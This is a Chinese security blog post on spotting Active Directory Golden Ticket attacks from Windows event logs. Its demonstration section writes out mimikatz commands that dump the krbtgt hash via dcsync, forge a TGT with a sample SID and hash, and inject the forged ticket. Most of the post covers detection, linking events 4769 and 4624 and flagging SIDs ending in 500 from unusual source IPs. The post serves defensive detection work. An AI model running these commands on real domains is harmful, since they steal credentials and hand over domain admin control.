<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    基于AD Event日志識別黃金票據攻擊

    VSole2022-12-19 09:46:52

    01、簡介

    黃金票據(Golden Ticket)是基于Kerberos認證的一種攻擊方式,常用來做域控權限維持。當攻擊者獲取到域內krbtgt帳戶的SID和HASH,就可以隨意偽造域內管理員用戶,再加上域帳戶krbtgt的密碼基本不會更改,即使域管修改了密碼,攻擊者依然可以通過黃金票據獲取域管理員權限。

    在域環境中,黃金票據無疑是一種特別危險的攻擊,是域控權限失陷的特征,基于AD Event日志如何檢測黃金票據攻擊,我們來研究一下。

    02、黃金票據攻擊實例

    黃金票據(Golden Ticket)的原理就是用krbtgt的hash來偽造TGT,只要擁有了高權限的TGT,就可以發送給TGS換取任意服務的ST。

    (1)利用mimikatz在域控服務器導出krbtgt的SID值和哈希值。

    lsadump::dcsync /domain:evil.com /user:krbtgt
    

    (2)在域用戶的服務器上使用mimikatz偽造TGT。

    kerberos::golden /admin:ceshi /domain:evil.com /sid:S-1-5-21-3269078399-3211204512-295171886 /krbtgt:51a721beadd396571257fd2d825be455 /ticket:golden.kiribi
    

    (3)清空域用戶服務器本地票據緩存,導入偽造的黃金票據。


    kerberos::purge  #清空本地票據緩存kerberos::ptt golden.kiribi #導入偽造的黃金票據 kerberos::list   #重新查看本地保存的票據
    

    (4)查看域控服務器的目錄

    03、黃金票據攻擊檢測

    從kerberos認證流程來看,正常的用戶認證登錄生成對應的日志是:4768(請求TGT,服務名稱krbtgt) -->4769(請求TGS,服務名稱WIN-DC01$)--> 4624(登錄帳戶,登錄進程Kerberos),但是由于黃金票據攻擊已經離線生成了TGT,跳過了請求TGT這一步,日志里只會有 4769(請求TGS)-->4624(登錄帳戶),我們重點來看一下這兩條日志里對應的具體的值。

    當注入黃金票據訪問服務,會出現兩次4769的事件,其中第一個4769事件請求的服務名稱是WIN-DC01$,第二個4769事件請求的krbtgt服務,伴隨著還有登錄用戶和來源ip地址。

    4624事件:記錄了黃金票據偽造的帳戶名ceshi在192.168.28.20通過kerberos進行網絡登錄,這里的帳戶與SID并不一致,500代表了域管帳戶,SID以500結尾可作為特征,通過帳戶與SID的對應關系,可以找到偽造的用戶,但是如果用戶偽造的是administrator用戶就可以繞過檢測,所以需要把登錄IP地址作為判定條件,收集域管理員登錄IP地址后,識別出異常登錄IP。

    黃金票據攻擊檢測規則:監測4624中LogonType為3的Kerberos登錄且SID以500結尾的日志事件,關聯到4769的請求事件,并注意觀察ServiceName的值。

    實時告警效果如下:

    票據
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    原理黃金票據的原理就是用krbtgt的hash來偽造TGT的內容。第四步主要是來驗證客戶端的身份。所謂的黃金票據其實就是kerberos認證的第二個階段中的tgs的ticket也就是TGT。
    在了解票據攻擊的過程中,看見了一篇文章使用Rubeus進行鉆石票據攻擊。但是沒有原理,于是抱著學習的心態在Google上尋找文章發現除了鉆石票據還有藍寶石票據
    客戶端收到該信息,使用自己的密碼進行解密之后,得到TGT票據。客戶端將服務請求與該ticket一并發送給相應的服務端即可。0x02 Kerberos協議具體流程 用戶登陸 用戶使用客戶端上的程序進行登陸。客戶端認證 客戶端從認證服務器獲取票據授權票據Ticket Granting Ticket簡稱TGT。服務器Server向客戶端Client提供相應的服務。0x03 白銀票據Silver Ticket偽造 白銀票據偽造的是TGS的票據,是一個點對點的有效憑證。
    當攻擊者獲取到域內krbtgt帳戶的SID和HASH,就可以隨意偽造域內管理員用戶,再加上域帳戶krbtgt的密碼基本不會更改,即使域管修改了密碼,攻擊者依然可以通過黃金票據獲取域管理員權限。在域環境中,黃金票據無疑是一種特別危險的攻擊,是域控權限失陷的特征,基于AD Event日志如何檢測黃金票據攻擊,我們來研究一下。利用mimikatz在域控服務器導出krbtgt的SID值和哈希值。
    Kerberos認證介紹Kerberos是一種計算機網絡授權協議,用來在非安全網絡中,對個人通信以安全的手段進行身份認證。這個詞又指麻省理工學院為這個協議開發的一套計算機軟件。而已有了金票后,就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改。
    尤其是做好網銀系統客戶端運行環境的安全檢測,采取有效措施提升網銀客戶端的安全級別,對不同的安全等級采取相應的風險防控措施。《上海票據交易所客戶服務協議》對系統和數據安全等也有約定。對違反有關法律法規、《規范》以及違反《上海票據交易所客戶服務協議》的行為,票交所將依法依約進行處理。二是各會員單位應加強自身信息系統安全檢查及加固,做好網絡安全事件監測,及時排除網絡安全隱患。
    域控滲透最常見的域持久性技術之一是黃金票據攻擊,它涉及使用“ krbtgt ”的 NTLM 哈希創建 kerberos 票證。但是在部署了 Active Directory 認證服務的服務器的域中,可能會在發生入侵時被濫用以實現域持久性。
    域滲透重要漏洞匯總
    域滲透就是基于windows域環境的滲透,而域滲透涉及到的技術,如哈希傳遞(PTH)票據傳遞(PTT)委派攻擊等,都是基于域環境下的認證機制來實現的,這也是為什么要了解Windows認證機制的原因之一Windows的認證包括三個部分,用戶直接操作計算機登陸賬戶(本地認證),遠程連接到工作組中的某個設備(網絡認證),登陸到域環境中的某個設備(域認證)
    研究人員發現一種新的勒索軟件,勒索軟件本身并不特別,加密用戶文件并索要贖金,但贖金票據提供的PayPal支付途徑(另一種支付方式為比特幣支付)會重定向用戶到釣魚網站并竊取PayPal憑證。用戶提交信息后,信息被發送到非PayPal.com的地址,頁面顯示表格要求用戶填寫地址和其他個人信息。填寫信息后,用戶收到帳戶已解鎖的通知,并返回正常PayPal登錄頁面。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类